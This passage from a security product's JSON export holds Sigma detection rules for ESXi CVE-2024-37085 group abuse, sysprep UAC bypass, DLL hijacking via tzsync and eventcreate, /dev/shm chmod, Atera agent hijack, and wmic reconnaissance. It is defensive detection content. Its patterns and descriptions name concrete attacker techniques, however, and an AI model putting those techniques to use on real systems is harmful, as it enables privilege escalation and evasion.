"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610443Z",
"creation_date": "2026-03-23T11:45:34.610446Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610454Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/",
"https://attack.mitre.org/techniques/T1078/002"
],
"name": "t1078_002_possible_cve_2024_37085_exp_net.yml",
"content": "title: Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass via net.exe\nid: 7b4df4b6-addb-4e81-b827-888adb454c64\ndescription: |\n Detects net.exe commands possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\n VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\n This group is not a built-in group in Active Directory and does not exist by default.\n It is recommended to investigate and determine if this is a legitimate administrative action.\nreferences:\n - https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/\n - https://attack.mitre.org/techniques/T1078/002\ndate: 2024/07/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078.002\n - cve.2024-37085\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2024-37085\n - classification.Windows.Exploit.ESXi\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\net1.exe'\n CommandLine|contains|all:\n - ' group'\n - 'ESX Admins'\n - ' ?add'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b4df4b6-addb-4e81-b827-888adb454c64",
"rule_name": "Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass via net.exe",
"rule_description": "Detects net.exe commands possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\nVMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nThis group is not a built-in group in Active Directory and does not exist by default.\nIt is recommended to investigate and determine if this is a legitimate administrative action.\n",
"rule_creation_date": "2024-07-30",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b7ca954-dcc7-4400-81d0-5affcc73a639",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092462Z",
"creation_date": "2026-03-23T11:45:34.092464Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092468Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.jpcert.or.jp/en/2015/02/a-new-uac-bypass-method-that-dridex-uses.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_sysprep.yml",
"content": "title: UAC Bypass Executed via sysprep\nid: 7b7ca954-dcc7-4400-81d0-5affcc73a639\ndescription: |\n Detects the execution of a UAC bypass via sysprep.exe through a DLL hijacking.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible to look for suspicious behavior, as well as the DLL loaded to look for malicious content.\nreferences:\n - https://blogs.jpcert.or.jp/en/2015/02/a-new-uac-bypass-method-that-dridex-uses.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/17\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_standard_hijack:\n Image: '?:\\Windows\\System32\\sysprep\\sysprep.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\sysprep\\\\*.dll'\n\n selection_renamed_hijack:\n Image: '?:\\Windows\\System32\\oobe.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\\\*.dll'\n\n selection_comctl32_sxs:\n Image: '?:\\Windows\\System32\\sysprep\\sysprep.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\sysprep\\sysprep.exe.local\\\\*\\comctl32.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n exclusion_other_signed:\n Signed: 'true'\n Signature:\n - 'Sophos Ltd' # C:\\Windows\\System32\\hmpalert.dll\n - 'Symantec Corporation' # C:\\Windows\\System32\\sysfer.dll\n - 'NVIDIA Corporation' # C:\\Windows\\System32\\DriverStore\\FileRepository\\nvdm.inf_amd64_0d270efa18f661b0\\nvdlistx.dll\n - 'Nexthink S.A.' # c:\\windows\\system32\\nxtwpm-6.29.2.1.dll\n - 'National Instruments Corporation' # c:\\windows\\system32\\nimdnsResponder.dll\n - 'Citrix Systems, Inc.' # C:\\Windows\\System32\\CtxKerbProvider.dll\n - 'Trend Micro, Inc.' # C:\\Windows\\System32\\tmumh\\20019\\TmMon\\2.9.0.1041\\tmmon64.dll, C:\\Windows\\System32\\tmumh\\20019\\AddOn\\8.55.0.1129\\TmUmEvt64.dll\n\n exclusion_not_signed:\n sha256:\n - '29b4ed3795cec1177eb367132914ce21c194cdec5db9dc923fd928c85e94d821' # C:\\Windows\\System32\\apphelp.dll\n - '3603fadca0060bd201148f9d59e4e2627f024609a6463ab525b5d1ad17bdcd10' # C:\\Windows\\System32\\RpcRtRemote.dll\n - '127506d1db38275614cbeb047c133718ef9d03266ba9c98be55ec7847cfc9c3d' # C:\\Windows\\System32\\netutils.dll\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b7ca954-dcc7-4400-81d0-5affcc73a639",
"rule_name": "UAC Bypass Executed via sysprep",
"rule_description": "Detects the execution of a UAC bypass via sysprep.exe through a DLL hijacking.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible to look for suspicious behavior, as well as the DLL loaded to look for malicious content.\n",
"rule_creation_date": "2020-09-17",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b819fb7-ea04-4fb8-a01f-693a84ccb874",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088019Z",
"creation_date": "2026-03-23T11:45:34.088021Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088026Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/mustang-panda-targets-europe/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_suspicious_execution_from_user_public_libraries.yml",
"content": "title: Suspicious Process Executed from Libraries Folder\nid: 7b819fb7-ea04-4fb8-a01f-693a84ccb874\ndescription: |\n Detects a suspicious execution from the libraries folder of the Public user.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to analyze the executed process to look for malicious behavior or content.\nreferences:\n - https://blog.talosintelligence.com/mustang-panda-targets-europe/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2024/03/06\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\Users\\Public\\Libraries\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b819fb7-ea04-4fb8-a01f-693a84ccb874",
"rule_name": "Suspicious Process Executed from Libraries Folder",
"rule_description": "Detects a suspicious execution from the libraries folder of the Public user.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to analyze the executed process to look for malicious behavior or content.\n",
"rule_creation_date": "2024-03-06",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7b923961-8481-4b2a-beb4-2f26146366fa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086388Z",
"creation_date": "2026-03-23T11:45:34.086390Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086394Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor",
"https://attack.mitre.org/techniques/T1222/002/"
],
"name": "t1222_002_chmod_executable_in_shared_memory_folder.yml",
"content": "title: Execution Permission Set to a File in a Shared Memory Folder\nid: 7b923961-8481-4b2a-beb4-2f26146366fa\ndescription: |\n Detects a suspicious attempt to give the execution permissions to a file located into a shared memory folder using the chmod command.\n This is often used by attackers to give execution permission to their malicious tools, either compiled locally or downloaded from the internet.\n It is recommended to investigate the file to determine its legitimacy.\nreferences:\n - https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor\n - https://attack.mitre.org/techniques/T1222/002/\ndate: 2024/10/09\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.defense_evasion\n - attack.t1222.002\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'chmod'\n Mode|endswith: '7??'\n ProcessImage|endswith: '/chmod'\n Path|startswith: '/dev/shm'\n\n filter_directories:\n Path|endswith: '/'\n\n filter_recursive:\n ProcessCommandLine|contains: ' -R '\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7b923961-8481-4b2a-beb4-2f26146366fa",
"rule_name": "Execution Permission Set to a File in a Shared Memory Folder",
"rule_description": "Detects a suspicious attempt to give the execution permissions to a file located into a shared memory folder using the chmod command.\nThis is often used by attackers to give execution permission to their malicious tools, either compiled locally or downloaded from the internet.\nIt is recommended to investigate the file to determine its legitimacy.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-01-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004",
"attack.t1222.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7bcf3a36-198e-4009-b9ca-2d44973c9bda",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603727Z",
"creation_date": "2026-03-23T11:45:34.603730Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603738Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/MaxRogers5/status/1572655029018038272",
"https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_suspicious_atera_agent_registry_configuration_change.yml",
"content": "title: Suspicious Atera Agent Registry Configuration Change\nid: 7bcf3a36-198e-4009-b9ca-2d44973c9bda\ndescription: |\n Detects suspicious registry configuration changeS of the legitimate remote access tool Atera Agent.\n Attackers can maliciously use Atera Agent by reconfiguring it to point to an attacker-controlled email address, thus providing remote access.\n It is recommended to analyze the changes made to the IntegratorLogin registry key to determine if the email set is linked with a legitimate administrator.\nreferences:\n - https://twitter.com/MaxRogers5/status/1572655029018038272\n - https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/09/26\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.Registry\n - classification.Windows.RMM.Atera\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\ATERA Networks\\AlphaAgent\\IntegratorLogin'\n Details|contains:\n - '@outlook'\n - '@hotmail'\n - '@msn'\n - '@aol'\n - '@yahoo'\n - '@live'\n - '@yandex'\n - '@gmail'\n - '@protonmail'\n - '@mail.ru'\n - '@mailto.plus'\n - '@dropmail'\n - '@firemail.com.br' # https://x.com/johnk3r/status/1854695923537805598\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7bcf3a36-198e-4009-b9ca-2d44973c9bda",
"rule_name": "Suspicious Atera Agent Registry Configuration Change",
"rule_description": "Detects suspicious registry configuration changeS of the legitimate remote access tool Atera Agent.\nAttackers can maliciously use Atera Agent by reconfiguring it to point to an attacker-controlled email address, thus providing remote access.\nIt is recommended to analyze the changes made to the IntegratorLogin registry key to determine if the email set is linked with a legitimate administrator.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7bd40b3f-9b14-4f0a-a24f-45c262b3e053",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587688Z",
"creation_date": "2026-03-23T11:45:34.587691Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587699Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tzsync.yml",
"content": "title: DLL Hijacking via tzsync.exe\nid: 7bd40b3f-9b14-4f0a-a24f-45c262b3e053\ndescription: |\n Detects potential Windows DLL Hijacking via tzsync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tzsync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7bd40b3f-9b14-4f0a-a24f-45c262b3e053",
"rule_name": "DLL Hijacking via tzsync.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tzsync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c308e9d-2d15-4d5b-90b5-1ec0b1c8a057",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587491Z",
"creation_date": "2026-03-23T11:45:34.587495Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587502Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_eventcreate.yml",
"content": "title: DLL Hijacking via eventcreate.exe\nid: 7c308e9d-2d15-4d5b-90b5-1ec0b1c8a057\ndescription: |\n Detects potential Windows DLL Hijacking via eventcreate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'eventcreate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c308e9d-2d15-4d5b-90b5-1ec0b1c8a057",
"rule_name": "DLL Hijacking via eventcreate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via eventcreate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7c35843a-8300-4ad9-a736-8ba3927a525a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620803Z",
"creation_date": "2026-03-23T11:45:34.620805Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620809Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://attack.mitre.org/techniques/T1047/"
],
"name": "t1047_wmic_discovery.yml",
"content": "title: Generic Discovery via wmic.exe\nid: 7c35843a-8300-4ad9-a736-8ba3927a525a\ndescription: |\n Detects the execution of wmic.exe to dump users, processes, softwares or services.\n Attackers can use this utility to perform various types of reconnaissance.\n It is recommended to analyze the process responsible for the execution of wmic.exe to look for malicious content or other malicious actions.\nreferences:\n - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n - https://attack.mitre.org/techniques/T1047/\ndate: 2022/11/07\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_susp_arguments:\n CommandLine|contains|all:\n - ' get '\n - ' Fullname'\n - ' PasswordAge'\n - ' NumberOfLogons'\n - ' Profile'\n\n selection_get_command:\n CommandLine|contains: ' get'\n\n selection_list_command:\n CommandLine|contains: ' list'\n\n selection_get_field:\n CommandLine|contains:\n - ' useraccount'\n - ' service '\n - ' product '\n\n selection_list_field:\n CommandLine|contains:\n - ' useraccount'\n - ' service '\n - ' product '\n - ' process'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_commandline:\n CommandLine|contains:\n - 'wmic.exe baseboard get '\n - 'wmic baseboard get '\n - 'service where name like ?tacticalrmm? get Name '\n - ' product where name like ?Microsoft Office Standard 2%? get name'\n\n exclusion_carestream:\n CommandLine: 'wmic service where name=Smart Link Gateway get StartName'\n ParentImage: '?:\\Program Files (x86)\\Carestream\\Smart Link Agent\\RMSPerl\\perl\\bin\\perl.exe'\n\n exclusion_atempo:\n ParentImage|startswith: '?:\\Program Files\\Atempo\\'\n\n exclusion_easily:\n CommandLine: 'wmic service where ?name=easily.socle.exploitation.agent? get name, startmode, state /format:csv'\n\n exclusion_legitimate_tools:\n - GrandparentCommandLine|contains:\n - '?:\\Program Files\\OCS Inventory Agent\\plugins\\CustomWinSoftware.ps1'\n - '\\Nutanix\\Move\\download\\scripts\\UninstallVMwareTools.ps1'\n - GrandparentImage:\n - '?:\\Program Files (x86)\\Carte Services 